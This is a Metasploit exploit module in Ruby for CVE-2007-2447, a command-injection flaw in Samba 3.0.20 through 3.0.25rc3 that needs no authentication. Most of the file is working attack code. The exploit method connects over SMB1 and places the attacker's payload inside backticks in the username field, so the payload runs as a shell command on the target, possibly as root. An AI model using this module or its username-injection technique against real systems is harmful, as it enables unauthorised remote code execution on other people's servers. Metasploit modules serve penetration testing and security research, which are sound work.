metasploit-gs/modules/exploits/multi/samba/usermap_script.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SMB::Client

  # For our customized version of session_setup_no_ntlmssp
  CONST = Rex::Proto::SMB::Constants
  CRYPT = Rex::Proto::SMB::Crypt

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Samba "username map script" Command Execution',
        'Description' => %q{
          This module exploits a command execution vulnerability in Samba
          versions 3.0.20 through 3.0.25rc3 when using the non-default
          "username map script" configuration option. By specifying a username
          containing shell meta characters, attackers can execute arbitrary
          commands.

          No authentication is needed to exploit this vulnerability since
          this option is used to map usernames prior to authentication!
        },
        'Author' => [ 'jduck' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2007-2447' ],
          [ 'OSVDB', '34700' ],
          [ 'BID', '23972' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
          [ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
        ],
        'Platform' => ['unix'],
        'Arch' => ARCH_CMD,
        'Privileged' => true, # root or nobody user
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true,
          'Compat' =>
                        {
                          'PayloadType' => 'cmd',
                          # *_perl and *_ruby work if they are installed
                          # mileage may vary from system to system..
                        }
        },
        'Targets' => [
          [ "Automatic", {} ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2007-05-14',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(139)
      ]
    )

    deregister_options('SMB::ProtocolVersion')
  end

  def exploit
    vprint_status('Use Rex client (SMB1 only) since this module is not compatible with RubySMB client')
    connect(versions: [1])

    # lol?
    username = "/=`nohup " + payload.encoded + "`"
    begin
      simple.client.negotiate(false)
      simple.client.session_setup_no_ntlmssp(username, rand_text(16), datastore['SMBDomain'], false)
    rescue ::Timeout::Error, XCEPT::LoginError
      # nothing, it either worked or it didn't ;)
    end

    handler
  end
end